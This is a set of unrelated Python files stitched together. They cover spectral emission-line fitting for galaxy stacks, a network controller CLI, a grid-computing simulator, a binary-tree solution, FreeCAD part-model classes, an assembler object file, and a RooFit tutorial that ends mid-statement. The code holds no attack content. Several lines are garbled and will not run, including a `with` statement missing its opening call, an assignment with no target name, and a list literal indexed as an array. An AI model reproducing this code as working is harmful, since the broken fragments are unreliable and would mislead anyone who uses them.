def interpolate_stack(self): """ Divides the measured stack in overlapping and non-overlapping parts with the model. """ self.stack=interp1d(self.wl,self.fl) self.stackErr=interp1d(self.wl,self.flErr) # bluer than model self.stBlue = (self.wl<=self.firefly_min_wavelength) # optical self.stOpt = (self.wl<self.firefly_max_wavelength)& (self.wl> self.firefly_min_wavelength) # redder than model self.stRed = (self.wl>=self.firefly_max_wavelength) if len(self.wl)<50 : print "no data, skips spectrum" return 0. if len(self.wl[self.stBlue])>0: self.contBlue=n.median(self.fl[self.stBlue]) self.side='blue' if len(self.wl[self.stRed])>0: self.contRed=n.median(self.fl[self.stRed]) self.side='red' if len(self.wl[self.stRed])>0 and len(self.wl[self.stBlue])>0: self.contRed=n.median(self.fl[self.stRed]) self.contBlue=n.median(self.fl[self.stBlue]) self.side='both' if len(self.wl[self.stRed])==0 and len(self.wl[self.stBlue])==0: self.side='none' def interpolate_model(self): """ Interpolates the model to an array with the same coverage as the stack. """ # overlap region with stack print "interpolate model" self.mdOK =(self.wlModel>n.min(self.wl))&(self.wlModel<n.max(self.wl)) mdBlue=(self.wlModel<=n.min(self.wl)) # bluer part than data mdRed=(self.wlModel>=n.max(self.wl)) # redder part than data okRed=(self.wlModel>4650)&(self.wlModel<self.firefly_max_wavelength) # Correction model => stack CORRection=n.sum((self.wl[self.stOpt][1:]-self.wl[self.stOpt][:-1])* self.fl[self.stOpt][1:]) / n.sum((self.wlModel[ self.mdOK ][1:]-self.wlModel[ self.mdOK ][:-1])* self.flModel [ self.mdOK ][1:]) print "Correction", CORRection if self.side=='red': self.model=interp1d(n.hstack((self.wlModel[ self.mdOK ],n.arange(self.wlModel[ self.mdOK ].max()+0.5, stack.x.max(), 0.5))), n.hstack(( self.flModel [ self.mdOK ]*CORRection, n.ones_like(n.arange( self.wlModel[ self.mdOK ].max() + 0.5, stack.x.max(), 0.5))*contRed )) ) elif self.side=='blue': self.model=interp1d(n.hstack((n.arange(stack.x.min(),self.wlModel[ self.mdOK ].min()-1., 0.5),self.wlModel[ self.mdOK ])),n.hstack(( n.ones_like(n.arange(stack.x.min() ,self.wlModel[ self.mdOK ].min() -1.,0.5))* contBlue, self.flModel [ self.mdOK ]*CORRection )) ) elif self.side=='both': x1=n.hstack((n.arange(stack.x.min(),self.wlModel[ self.mdOK ].min()-1., 0.5), self.wlModel[ self.mdOK ])) y1=n.hstack(( n.ones_like(n.arange(stack.x.min(),self.wlModel[ self.mdOK ].min()- 1.,0.5))*contBlue, self.flModel [ self.mdOK ]*CORRection )) x2=n.hstack((x1,n.arange(self.wlModel[ self.mdOK ].max()+0.5,stack.x.max(),0.5))) y2=n.hstack((y1,n.ones_like(n.arange(self.wlModel[ self.mdOK ].max()+0.5, stack.x.max(), 0.5))*contRed )) self.model=interp1d(x2,y2) elif self.side=='none': self.model=interp1d(self.wlModel[ self.mdOK ], self.flModel [ self.mdOK ]) def subtract_continuum_model(self): """ Creates the continuum substracted spectrum: the 'line' spectrum. """ self.interpolate_stack() self.interpolate_model() # wavelength range common to the stack and the model : self.wlLineSpectrum = n.arange(n.max([self.stack.x.min(),self.model.x.min()]), n.min([self.stack.x.max(),self.model.x.max()]), 0.5)[2:-1] print "range probed", self.wlLineSpectrum[0], self.wlLineSpectrum[-1], len( self.wlLineSpectrum) self.flLineSpectrum=n.array([self.stack(xx)-self.model(xx) for xx in self.wlLineSpectrum]) self.flErrLineSpectrum=self.stackErr(self.wlLineSpectrum) def fit_lines_to_lineSpectrum(self): """ Fits the emission lines on the line spectrum. """ # interpolates the mean spectra. print "fits to the line spectrum" lfit = lineFit.LineFittingLibrary() #self.subtract_continuum_model() data,h=[],[] print O2_3727 dat_mean,mI,hI=lfit.fit_Line_OIIdoublet_position(self.wlLineSpectrum, self.flLineSpectrum, self.flErrLineSpectrum, a0= O2_3727 , lineName="O2_3728", p0_sigma=7,model="gaussian",fitWidth = 20.,DLC=10.) print hI, dat_mean d_out=[] for kk in range(10): fluxRR = interp1d(self.wl,['jackknifeSpectra'].T[kk][self.selection]) flLineSpectrumRR=n.array([fluxRR(xx)-self.model(xx) for xx in self.wlLineSpectrum]) d1,mI,hI=lfit.fit_Line_OIIdoublet_position(self.wlLineSpectrum, flLineSpectrumRR, self.flErrLineSpectrum, a0= O2_3727 , lineName="O2_3728", p0_sigma=7,model="gaussian",fitWidth = 20.,DLC=10.) d_out.append(d1) d_out = n.array(d_out) #print "jk out", d_out err_out = n.std(d_out,axis=0) #print "before", err_out, dat_mean # assign error values : dat_mean[3] = err_out[3-1] dat_mean[5] = err_out[5-1] dat_mean[7] = err_out[7-1] #print "after", dat_mean data.append(dat_mean) h.append(hI) for li in allLinesList : # measure line properties from the mean weighted stack print li[2] dat_mean,mI,hI=lfit.fit_Line_position_C0noise(self.wlLineSpectrum, self.flLineSpectrum, self.flErrLineSpectrum, li[1], lineName=li[2], continuumSide=li[3], model="gaussian", p0_sigma=7,fitWidth = 15.,DLC=10.) print hI, dat_mean # measure its dispersion using the stacks d_out=[] for kk in range(len(['jackknifeSpectra'].T)): fluxRR = interp1d(self.wl,['jackknifeSpectra'].T[kk][self.selection]) flLineSpectrumRR=n.array([fluxRR(xx)-self.model(xx) for xx in self.wlLineSpectrum]) d1,mI,hI=lfit.fit_Line_position_C0noise(self.wlLineSpectrum, flLineSpectrumRR, self.flErrLineSpectrum, li[1], lineName=li[2], continuumSide=li[3], model="gaussian", p0_sigma=7,fitWidth = 15.,DLC=10.) d_out.append(d1) d_out = n.array(d_out) err_out = n.std(d_out,axis=0) # assign error values : dat_mean[2] = err_out[2-1] dat_mean[4] = err_out[4-1] dat_mean[6] = err_out[6-1] data.append(dat_mean) h.append(hI) heading="".join(h) out=n.hstack((data)) #print "out", out out[n.isnan(out)]=n.ones_like(out[n.isnan(out)])*self.dV #output = n.array([ out ]) #print "----------------", output.T[0], output.T[1], output colNames = heading.split() #print colNames col0 = fits.Column(name=colNames[0],format='D', array= n.array([out.T[0]])) col1 = fits.Column(name=colNames[1],format='D', array= n.array([out.T[1]])) self.lineSpec_cols = fits.ColDefs([col0, col1]) #print self.lineSpec_cols #print colNames for ll in range(2,len(colNames),1): #self.hdR["HIERARCH "+colNames[ll]+"_nc"] = out.T[ll] self.lineSpec_cols += fits.Column(name=colNames[ll], format='D', array= n.array([out.T[ll]]) ) #print self.lineSpec_cols self.lineSpec_tb_hdu = fits.BinTableHDU.from_columns(self.lineSpec_cols) def fit_lines_to_fullSpectrum(self): """ Fits the emission lines on the line spectrum. """ # interpolates the mean spectra. print "fits to full spectrum" lfit = lineFit.LineFittingLibrary() data,h=[],[] print O2_3727 dat_mean,mI,hI=lfit.fit_Line_OIIdoublet_position(self.wl, self.fl, self.flErr, a0= O2_3727 , lineName="O2_3728", p0_sigma=7,model="gaussian",fitWidth = 20.,DLC=10.) print hI, dat_mean d_out=[] for kk in range(10): d1,mI,hI=lfit.fit_Line_OIIdoublet_position(self.wl,['jackknifeSpectra'].T[kk][self.selection], self.flErr , a0= O2_3727 , lineName="O2_3728", p0_sigma=7,model="gaussian",fitWidth = 20.,DLC=10.) d_out.append(d1) d_out = n.array(d_out) #print "jk out", d_out err_out = n.std(d_out,axis=0) #print "before", err_out, dat_mean # assign error values : dat_mean[3] = err_out[3-1] dat_mean[5] = err_out[5-1] dat_mean[7] = err_out[7-1] #print "after", dat_mean data.append(dat_mean) h.append(hI) for li in allLinesList : print li[2] # measure line properties from the mean weighted stack dat_mean,mI,hI=lfit.fit_Line_position_C0noise(self.wl, self.fl, self.flErr, li[1], lineName=li[2], continuumSide=li[3], model="gaussian", p0_sigma=7,fitWidth = 15.,DLC=10.) print hI, dat_mean # measure its dispersion using the stacks d_out=[] for kk in range(len(['jackknifeSpectra'].T)): d1,mI,hI=lfit.fit_Line_position_C0noise(self.wl,['jackknifeSpectra'].T[kk][self.selection], self.flErr, li[1], lineName=li[2], continuumSide=li[3], model="gaussian", p0_sigma=7,fitWidth = 15.,DLC=10.) d_out.append(d1) d_out = n.array(d_out) err_out = n.std(d_out,axis=0) # assign error values : dat_mean[2] = err_out[2-1] dat_mean[4] = err_out[4-1] dat_mean[6] = err_out[6-1] data.append(dat_mean) #print li[2], dat_mean h.append(hI) heading="".join(h) out=n.hstack((data)) out[n.isnan(out)]=n.ones_like(out[n.isnan(out)])*self.dV #output = n.array([ out ]) #print "----------------", output.T[0], output.T[1], output colNames = heading.split() #print colNames col0 = fits.Column(name=colNames[0],format='D', array= n.array([out.T[0]])) col1 = fits.Column(name=colNames[1],format='D', array= n.array([out.T[1]])) self.fullSpec_cols = fits.ColDefs([col0, col1]) #print colNames for ll in range(2,len(colNames),1): #self.hdR["HIERARCH "+colNames[ll]+"_nc"] = out.T[ll] self.fullSpec_cols += fits.Column(name=colNames[ll], format='D', array= n.array([out.T[ll]]) ) self.fullSpec_tb_hdu = fits.BinTableHDU.from_columns(self.fullSpec_cols) def fit_lines_to_lineSpectrum_tutorial(self): """ Fits the emission lines on the line spectrum. """ # interpolates the mean spectra. print "fits to the line spectrum" lfit = lineFit.LineFittingLibrary() #self.subtract_continuum_model() data,h=[],[] print O2_3727 dat_mean,mI,hI=lfit.fit_Line_OIIdoublet_position(self.wlLineSpectrum, self.flLineSpectrum, self.flErrLineSpectrum, a0= O2_3727 , lineName="O2_3728", p0_sigma=7,model="gaussian",fitWidth = 20.,DLC=10.) data.append(dat_mean) h.append(hI) for li in allLinesList : # measure line properties from the mean weighted stack print li[2] dat_mean,mI,hI=lfit.fit_Line_position_C0noise(self.wlLineSpectrum, self.flLineSpectrum, self.flErrLineSpectrum, li[1], lineName=li[2], continuumSide=li[3], model="gaussian", p0_sigma=7,fitWidth = 15.,DLC=10.) data.append(dat_mean) h.append(hI) heading="".join(h) out=n.hstack((data)) #print "out", out out[n.isnan(out)]=n.ones_like(out[n.isnan(out)])*self.dV #output = n.array([ out ]) #print "----------------", output.T[0], output.T[1], output colNames = heading.split() #print colNames col0 = fits.Column(name=colNames[0],format='D', array= n.array([out.T[0]])) col1 = fits.Column(name=colNames[1],format='D', array= n.array([out.T[1]])) self.lineSpec_cols = fits.ColDefs([col0, col1]) #print self.lineSpec_cols #print colNames for ll in range(2,len(colNames),1): #self.hdR["HIERARCH "+colNames[ll]+"_nc"] = out.T[ll] self.lineSpec_cols += fits.Column(name=colNames[ll], format='D', array= n.array([out.T[ll]]) ) #print self.lineSpec_cols self.lineSpec_tb_hdu = fits.BinTableHDU.from_columns(self.lineSpec_cols) def fit_lines_to_fullSpectrum_tutorial(self): """ Fits the emission lines on the line spectrum. """ # interpolates the mean spectra. print "fits to full spectrum" lfit = lineFit.LineFittingLibrary() data,h=[],[] print O2_3727 dat_mean,mI,hI=lfit.fit_Line_OIIdoublet_position(self.wl, self.fl, self.flErr, a0= O2_3727 , lineName="O2_3728", p0_sigma=7,model="gaussian",fitWidth = 20.,DLC=10.) print hI, dat_mean data.append(dat_mean) h.append(hI) for li in allLinesList : print li[2] # measure line properties from the mean weighted stack dat_mean,mI,hI=lfit.fit_Line_position_C0noise(self.wl, self.fl, self.flErr, li[1], lineName=li[2], continuumSide=li[3], model="gaussian", p0_sigma=7,fitWidth = 15.,DLC=10.) print hI, dat_mean # measure its dispersion using the stacks data.append(dat_mean) #print li[2], dat_mean h.append(hI) heading="".join(h) out=n.hstack((data)) out[n.isnan(out)]=n.ones_like(out[n.isnan(out)])*self.dV #output = n.array([ out ]) #print "----------------", output.T[0], output.T[1], output colNames = heading.split() #print colNames col0 = fits.Column(name=colNames[0],format='D', array= n.array([out.T[0]])) col1 = fits.Column(name=colNames[1],format='D', array= n.array([out.T[1]])) self.fullSpec_cols = fits.ColDefs([col0, col1]) #print colNames for ll in range(2,len(colNames),1): #self.hdR["HIERARCH "+colNames[ll]+"_nc"] = out.T[ll] self.fullSpec_cols += fits.Column(name=colNames[ll], format='D', array= n.array([out.T[ll]]) ) self.fullSpec_tb_hdu = fits.BinTableHDU.from_columns(self.fullSpec_cols) def save_spectrum(self): """ Saves the stack spectrum, the model and derived quantities in a single fits file with different hdus. """ wavelength = fits.Column(name="wavelength",format="D", unit="Angstrom", array= self.wlLineSpectrum) flux = fits.Column(name="flux",format="D", unit="Angstrom", array= self.flLineSpectrum) fluxErr = fits.Column(name="fluxErr",format="D", unit="Angstrom", array= self.flErrLineSpectrum) # new columns cols = fits.ColDefs([wavelength, flux, fluxErr]) lineSptbhdu = fits.BinTableHDU.from_columns(cols) # previous file prihdu = fits.PrimaryHDU(header=self.hdR) thdulist = fits.HDUList([prihdu, self.hdu1, self.hdu2, lineSptbhdu, self.lineSpec_tb_hdu, self.fullSpec_tb_hdu]) outPutFileName = self.stack_model_file outFile = n.core.defchararray.replace(outPutFileName, "fits", "model").item() if self.tutorial: outFile = join( os.environ['DATA_DIR'], "ELG-composite", self.stack_file_base[:-5]+".model" ) if self.eboss_stack: #outFile = join(os.environ['DATA_DIR'],"ELG-composite", "stacks", "model", self.stack_file_base[:-6] + ".model.fits") outFile = join(os.environ['EBOSS_TARGET'],"elg", "tests", "stacks", "model", self.stack_file_base[:-6] + ".model") if os.path.isfile(outFile): os.remove(outFile) thdulist.writeto(outFile)
#! /usr/bin/python # -*- coding: utf-8 -*- """ Copyright (C) 2013 Anders Nylund This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <>. """ from __future__ import print_function from argparse import ArgumentParser from protocol import Proxy PORT = 8483 # Controller port PASSWORD = '0123456789' def getfunc(args, proxy): l = proxy.get(args.path) print('\n'.join(l)) def setfunc(args, proxy): l = proxy.set(args.path, args.value) print('\n'.join(l)) def rawfunc(args, proxy): response = proxy.make_request(int(args.function), args.payload) if args.verbose: print('response from:', proxy.addr) print('IP:', proxy.ip, 'Serial', proxy.serial) print('received: ' + (response.framedata[1:-1]).decode('ascii')) print(' status: %d'%response.status) print(' function: %d'%response.function) print(' payload:\n ' + '\n '.join(response.payload.split(';'))) else: print('\n'.join(response.payload.split(';'))) if __name__ == '__main__': argparser = ArgumentParser() argparser.add_argument('-v', '--verbose', action='store_true') argparser.add_argument('-a', '--address', default=None, help='controller address, autodiscovered if omitted') argparser.add_argument('-p', '--password', default=PASSWORD) argparser.add_argument('-s', '--serial', default='000000') subparsers = argparser.add_subparsers(help='sub-command help') # create the parser for the "raw" command parser_b = subparsers.add_parser('raw', help='') parser_b.add_argument('function', help='') parser_b.add_argument('payload', help='') parser_b.set_defaults(func=rawfunc) # create the parser for the "set" command parser_b = subparsers.add_parser('set', help='write item value') parser_b.add_argument('path', nargs='?', default = '*', help='path to write') parser_b.add_argument('value', nargs='?', help='value to write') parser_b.set_defaults(func=setfunc) # create the parser for the "get" command parser_c = subparsers.add_parser('get', help='get all items') parser_c.add_argument('path', nargs='?', default = '*', help='partial of full path to item') parser_c.set_defaults(func=getfunc) args = argparser.parse_args() if args.address is None: with, PORT, args.serial) as proxy: args.func(args, proxy) else: with Proxy(args.password, PORT, args.address, args.serial) as proxy: args.func(args, proxy)
#!/usr/bin/env python """Provide a interface for simulating master worker computing on a desktop grid based on traces. Thanks to Derrick Kondo for the idea. """ __author__ = "Eric Heien <>" __date__ = "2 May 2009" import errno import heapq import array # TODO: have some sort of wraparound for worker availability intervals, # or cleanly error out for workers that are no longer available class SimWorker: def __init__(self, worker_name, worker_speed, worker_avail_lens, worker_avail_fracs): self._name = worker_name self._speed = worker_speed self._avail_lens = array.ArrayType('f') self._avail_fracs = array.ArrayType('f') self._avail_lens.fromlist(worker_avail_lens) self._avail_fracs.fromlist(worker_avail_fracs) self._avail_ind = 0 self._cur_time = 0 self._sub_avail_time = 0 self._task_wall_times = [] self._task_cpu_times = [] # TODO: handle going out of bounds on avail array # Simulates the worker performing cpu_secs # Returns the actual wall time to complete this def run_cpu(self, cpu_secs): self._task_cpu_times.append(cpu_secs) wall_exec_time = 0 while cpu_secs > 0: # Calculate the speed of this worker during the interval worker_int_speed = self._avail_fracs[self._avail_ind] * self._speed # Determine the remaining length of this interval int_remaining_secs = self._avail_lens[self._avail_ind] - self._sub_avail_time # Determine the available CPU seconds in this interval int_cpu_secs = int_remaining_secs * worker_int_speed # If we won't finish the task in this interval if int_cpu_secs < cpu_secs: # Move to the next interval wall_exec_time += int_remaining_secs self._avail_ind += 1 self._sub_avail_time = 0 cpu_secs -= int_cpu_secs else: # Move to the middle of this interval executed_secs = cpu_secs/worker_int_speed wall_exec_time += executed_secs self._sub_avail_time += executed_secs cpu_secs = 0 self._cur_time += wall_exec_time self._task_wall_times.append(wall_exec_time) # Advances the wall time of this worker by wall_secs # If the worker is not available at the new time, # advances the wall time further until the worker is available def advance_wall_time(self, wall_secs): rem_secs = wall_secs # Advance the availablity interval pointer until we've passed wall_secs while rem_secs > 0: int_remaining_secs = self._avail_lens[self._avail_ind] - self._sub_avail_time if int_remaining_secs < rem_secs: rem_secs -= int_remaining_secs self._sub_avail_time = 0 self._avail_ind += 1 else: self._sub_avail_time += rem_secs rem_secs = 0 # Advance until we're in an available state additional_secs = 0 while self._avail_fracs[self._avail_ind] == 0: additional_secs += self._avail_lens[self._avail_ind] - self._sub_avail_time self._avail_ind += 1 self._sub_avail_time = 0 # Advance the current simulation time self._cur_time += wall_secs + additional_secs # Test if this worker is available at sim_time def past_sim_time(self, sim_time): if sim_time >= self._cur_time: return True else: return False def __str__(self): return self._name def __repr__(self): return self._name def __cmp__(self, other): return self._cur_time - other._cur_time class GridSimulatorInterface: def __init__(self, trace_files=[]): self._cur_sim_time = 0 self._num_executed_tasks = 0 self._worker_list = [] self._waiting_list = [] def add_worker(self, worker): # Advance the new worker to its first available time worker.advance_wall_time(0) # If the new worker isn't available at the start, put it on the waiting list if not worker.past_sim_time(0): self._worker_list.append(worker) else: heapq.heappush(self._waiting_list, worker) def generate_workers(self, num_workers, speed_func, avail_func): for wnum in range(num_workers): new_worker_speed = speed_func(wnum) new_worker_avail_lens, new_worker_avail_fracs = avail_func(wnum) new_worker = SimWorker("W"+str(wnum), new_worker_speed, new_worker_avail_lens, new_worker_avail_fracs) self.add_worker(new_worker) def read_workers_from_fta_tab_files(self, event_trace_file, num_workers=None): if event_trace_file: worker_dict = {} event_trace_file.readline() # skip the header line for line in event_trace_file: split_line = line.split() node_id, start_time, stop_time = split_line[2], float(split_line[6]), float(split_line[7]) if node_id not in worker_dict: if num_workers and len(worker_dict) >= num_workers: break else: worker_dict[node_id] = [] worker_dict[node_id].append([start_time, stop_time]) for worker_id in worker_dict: avail_lens = [] avail_fracs = [] worker_times = worker_dict[worker_id] last_interval_end = 0 for int_time in worker_times: interval_length = int_time[0] - start_time start_time = int_time[1] #print((worker_id, worker_times)) # If none of the workers matched the available tasks and there are still workers in the wait queue, # advance simulation time and tell PyMW to try again def try_avail_check_again(self): if len(self._waiting_list) == 0: return False self._cur_sim_time = self._waiting_list[0]._cur_time return True def get_available_workers(self): # Pop workers off the sorted waiting list until cur_sim_time while len(self._waiting_list) > 0 and self._waiting_list[0].past_sim_time(self._cur_sim_time): self._worker_list.append(heapq.heappop(self._waiting_list)) return self._worker_list def reserve_worker(self, worker): self._worker_list.remove(worker) def worker_finished(self, worker): heapq.heappush(self._waiting_list, worker) def execute_task(self, task, worker): if not worker: raise Exception("Cannot use NULL worker") # Get the CPU seconds for the specified task and worker task_exec_time = task._raw_exec(worker) # Run the worker for task_exec_time CPU seconds worker.run_cpu(task_exec_time) self._num_executed_tasks += 1 task.task_finished(None) # notify the task # Compute statistics (mean, median, stddev) on values in the array def compute_stats(self, times): times.sort() total_time = 0 for x in times: total_time += x mean_time = total_time / len(times) median_time = times[len(times)/2] stddev_time = 0 for time_n in times: stddev_time += pow(mean_time - time_n, 2) stddev_time = pow(stddev_time/len(times), 0.5) return total_time, mean_time, median_time, stddev_time def get_status(self): wall_times = [] cpu_times = [] for worker in self._worker_list: wall_times.extend(worker._task_wall_times) cpu_times.extend(worker._task_cpu_times) for worker in self._waiting_list: wall_times.extend(worker._task_wall_times) cpu_times.extend(worker._task_cpu_times) if len(wall_times) > 0: total_wall_time, mean_wall_time, median_wall_time, stddev_wall_time = self.compute_stats(wall_times) total_cpu_time, mean_cpu_time, median_cpu_time, stddev_cpu_time = self.compute_stats(cpu_times) else: total_wall_time = mean_wall_time = median_wall_time = stddev_wall_time = 0 total_cpu_time = mean_cpu_time = median_cpu_time = stddev_cpu_time = 0 worker_sim_times = [worker._cur_time for worker in self._worker_list] worker_sim_times.append(0) cur_sim_time = max(worker_sim_times) num_workers = len(self._worker_list) + len(self._waiting_list) return {"num_total_workers" : num_workers, "num_executed_tasks" : self._num_executed_tasks, "cur_sim_time": cur_sim_time, "total_wall_time": total_wall_time, "mean_wall_time": mean_wall_time, "median_wall_time": median_wall_time, "stddev_wall_time": stddev_wall_time, "total_cpu_time": total_cpu_time, "mean_cpu_time": mean_cpu_time, "median_cpu_time": median_cpu_time, "stddev_cpu_time": stddev_cpu_time, } def pymw_master_read(self, loc): return None, None, None def pymw_master_write(self, output, loc): return None def pymw_worker_read(loc): return None def pymw_worker_write(output, loc): return None def pymw_worker_func(func_name_to_call): return None
# -*- encoding: utf-8 -*- ''' Given a binary tree, imagine yourself standing on the right side of it, return the values of the nodes you can see ordered from top to bottom. For example: Given the following binary tree, 1 <--- / \ 2 3 <--- \ \ 5 4 <--- You should return [1, 3, 4]. ''' # Definition for a binary tree node. # class TreeNode(object): # def __init__(self, x): # self.val = x # self.left = None # self.right = None class Solution(object): def rightSideView(self, root): """ :type root: TreeNode :rtype: List[int] """ if root == None: return [] res = [] q = [root] while len(q) != 0: res.append(q[len(q) - 1].val) temp = [] for item in q: if item.left != None: temp.append(item.left) if item.right != None: temp.append(item.right) q = temp return res
# -*- coding: utf8 -*- #!/usr/bin/python # #**************************************************************************** #* * #* base classes for generating part models in STEP AP214 * #* * #* This is part of FreeCAD & cadquery tools * #* to export generated models in STEP & VRML format. * #* Copyright (c) 2017 * #* Terje Io * #* Maurice * #* * #* All trademarks within this guide belong to their legitimate owners. * #* * #* This program is free software; you can redistribute it and/or modify * #* it under the terms of the GNU Lesser General Public License (LGPL) * #* the License, or (at your option) any later version. * #* for detail see the LICENCE text file. * #* * #* This program is distributed in the hope that it will be useful, * #* but WITHOUT ANY WARRANTY; without even the implied warranty of * #* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * #* GNU Library General Public License for more details. * #* * #* You should have received a copy of the GNU Library General Public * #* License along with this program; if not, write to the Free Software * #* Foundation, Inc., * #* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA * #* * #**************************************************************************** # 2017-11-25 # # parts of this code is based on work by other contributors # from collections import namedtuple ### use enums (Phyton 3+) class CaseType: r"""A class for holding constants for part types .. note:: will be changed to enum when Python version allows it """ THT = 'THT' r"""THT - trough hole part """ SMD = 'SMD' r"""SMD - surface mounted part """ class PinStyle: r"""A class for holding constants for pin styles .. note:: will be changed to enum when Python version allows it """ STRAIGHT = 'Straight' ANGLED = 'Angled' ### # # The following classes must be subclassed # class PartParametersBase: """ .. document private functions .. automethod:: _make_params """ Model = namedtuple("Model", [ 'variant', # generic model name 'params', # parameters 'model' # model creator class ]) """ Internally used for passing information from the base parameters to the class instance used for creating models .. py:attribute:: variant The generic name from the list of parameters .. py:attribute:: params The final parameters passed to the class instance .. py:attribute:: model The class instance itself """ Params = namedtuple("Params", [ 'num_pins', 'pin_pitch', 'pin_style', 'type' ]) """ Basic parameters for parts, if further parameters are required this should be subclassed/overriden .. note:: The existing parameters should be kept with the same name when overriden as the framework requires them .. py:attribute:: num_pins Number of pins, for parts with this is usually set to None for .. py:attribute:: pin_pitch The final parameters passed to the class instance .. py:attribute:: pin_style The class instance itself .. py:attribute:: type The class instance itself """ def __init__(self): self.base_params = {} def _make_params(self, pin_pitch, num_pin_rows, pin_style, type): r"""add a list of new points """ return self.Params( num_pins = None, # to be added programmatically pin_pitch = pin_pitch, # pin pitch pin_style = pin_style, # pin style: 'Straight' or 'Angled' type = type # part type: 'THT' or 'SMD' ) def getAllModels(self, model_classes): r"""Generate model parameters for all series and variants Loops through all base parameters and model classes instantiating the classes and checks whether a variant should be made. If a variant is to be made a namedtuple is made with the index from a call to the model instance makeModelName method and the base parameters are copied to this. When copying the base parameters others may be added such as number of pins (num_pins). .. note:: Typically this method is overriden in order to add calculated parameters like number of pins. The model specific parameters are contained in the model class itself. :param model_classes: list of part creator classes inherited from :class:`cq_base_model.PartBase` :type model_classes: ``list of classes`` :rtype: ```tuple```` """ models = {} # instantiate generator classes in order to make a dictionary of all model names for i in range(0, len(model_classes)): for variant in self.base_params.keys(): params = self.base_params[variant] model = model_classes[i](params) if model.make_me: models[model.makeModelName(variant)] = self.Model(variant, params, model_classes[i]) return models def getSampleModels(self, model_classes): r"""Generate model parameters for all series and variants Loops through all base parameters and model classes instantiating the classes and checks whether a variant should be made. If a variant is to be made a namedtuple is made with the index from a call to the model instance makeModelName method and the base parameters are copied to this. When copying the base parameters others may be added such as number of pins (num_pins). .. note:: Typically this method is overriden in order to add calculated parameters like number of pins. The model specific parameters are contained in the model class itself. :param model_classes: list of part creator classes inherited from :class:`cq_base_model.PartBase` :type model_classes: ``list of classes`` :rtype: ```tuple```` """ models = {} # instantiate generator classes in order to make a dictionary of all default variants for i in range(0, len(model_classes)): variant = model_classes[i].default_model params = self.base_params[variant] model = model_classes[i](params) if model.make_me: models[model.makeModelName(variant)] = self. Model(variant, params, model_classes[i]) return models def getModel(self, model_class, variant): r"""Generate model parameters for all series and variants Gets the parameters for a single variant. If a variant is to be made a namedtuple is made with the index from a call to the model instance makeModelName method and the base parameters are copied to this. When copying the base parameters others may be added such as number of pins (num_pins). .. note:: Typically this method is overriden in order to add calculated parameters like number of pins. The model specific parameters are contained in the model class itself. :param model_classe: part creator class inherited from :class:`cq_base_model.PartBase` :type model_classes: ``list of classes`` :rtype: ```tuple```` """ model = self.base_params.has_key(variant) # instantiate generator class in order to make a dictionary entry for a single variant if model: params = self.base_params[variant] model = model_class(params) if not model.make_me: model = False return model ### EOF ###
# Represents the object file recognized by the Luz architecture. # An object file is relocatable. It is created by the assembler, # and later combined with other object files by the linker into # an executable. # # Luz micro-controller assembler # Eli Bendersky (C) 2008-2010 # class ObjectFile(object): """ Use one of the factory methods to create ObjectFile instances: from_assembler, from_file The name of the object can be accessed via the .name attribute. """ def __init__(self): self.seg_data = {} self.export_table = [] self.import_table = [] self.reloc_table = [] = None @classmethod def from_assembler( cls, seg_data, export_table, import_table, reloc_table): """ Create a new ObjectFile from assembler-generated data structures. """ obj = cls() assert isinstance(seg_data, dict) for table in (export_table, import_table, reloc_table): assert isinstance(table, list) obj.seg_data = seg_data obj.export_table = export_table obj.import_table = import_table obj.reloc_table = reloc_table return obj @classmethod def from_file(cls, file): """ 'file' is either a filename (a String), or a readable IO object. """ pass
## \file ## \ingroup tutorial_roofit ## \notebook ## Addition and convolution: options for plotting components of composite p.d.f.s. ## ## \macro_code ## ## \date February 2018 ## \author Clemens Lange, Wouter Verkerke (C++ version) import ROOT # Set up composite pdf # -------------------------------------- # Declare observable x x = ROOT.RooRealVar("x", "x", 0, 10) # Create two Gaussian PDFs g1(x,mean1,sigma) anf g2(x,mean2,sigma) and # their parameters mean = ROOT.RooRealVar("mean", "mean of gaussians", 5) sigma1 = ROOT.RooRealVar("sigma1", "width of gaussians", 0.5) sigma2 = ROOT.RooRealVar("sigma2", "width of gaussians", 1) sig1 = ROOT.RooGaussian("sig1", "Signal component 1", x, mean, sigma1) sig2 = ROOT.RooGaussian("sig2", "Signal component 2", x, mean, sigma2) # Sum the signal components into a composite signal p.d.f. sig1frac = ROOT.RooRealVar( "sig1frac", "fraction of component 1 in signal", 0.8, 0., 1.) sig = ROOT.RooAddPdf( "sig", "Signal", ROOT.RooArgList(sig1, sig2), ROOT.RooArgList(sig1frac)) # Build Chebychev polynomial p.d.f. a0 = ROOT.RooRealVar("a0", "a0", 0.5, 0., 1.) a1 = ROOT.RooRealVar("a1", "a1", -0.2, 0., 1.) bkg1 = ROOT.RooChebychev("bkg1", "Background 1", x, ROOT.RooArgList(a0, a1)) # Build expontential pdf alpha = ROOT.RooRealVar("alpha", "alpha", -1) bkg2 = ROOT.RooExponential("bkg2", "Background 2", x, alpha) # Sum the background components into a composite background p.d.f. bkg1frac = ROOT.RooRealVar( "sig1frac", "fraction of component 1 in background", 0.2, 0., 1.) bkg = ROOT.RooAddPdf( "bkg", "Signal", ROOT.RooArgList(bkg1, bkg2), ROOT.RooArgList(sig1frac)) # Sum the composite signal and background bkgfrac = ROOT.RooRealVar("bkgfrac", "fraction of background", 0.5, 0., 1.) model = ROOT.RooAddPdf( "model", "g1+g2+a", ROOT.RooArgList(bkg, sig), ROOT.RooArgList(bkgfrac)) # Set up basic plot with data and full pdf # ------------------------------------------------------------------------------ # Generate a data sample of 1000 events in x from model data = model.generate(ROOT.RooArgSet(x), 1000) # Plot data and complete PDF overlaid xframe = x.frame(ROOT.RooFit.Title( "Component plotting of pdf=(sig1+sig2)+(bkg1+bkg2)")) data.plotOn(xframe) model.plotOn(xframe) # Clone xframe for use below xframe2 = xframe.Clone("xframe2") # Make component by object reference # -------------------------------------------------------------------- # Plot single background component specified by object reference ras_bkg = ROOT.RooArgSet(bkg) model.plotOn(xframe, ROOT.RooFit.Components( ras_bkg), ROOT.RooFit.LineColor(ROOT.kRed)) # Plot single background component specified by object reference ras_bkg2 = ROOT.RooArgSet(bkg2) model.plotOn(xframe, ROOT.RooFit.Components(ras_bkg2), 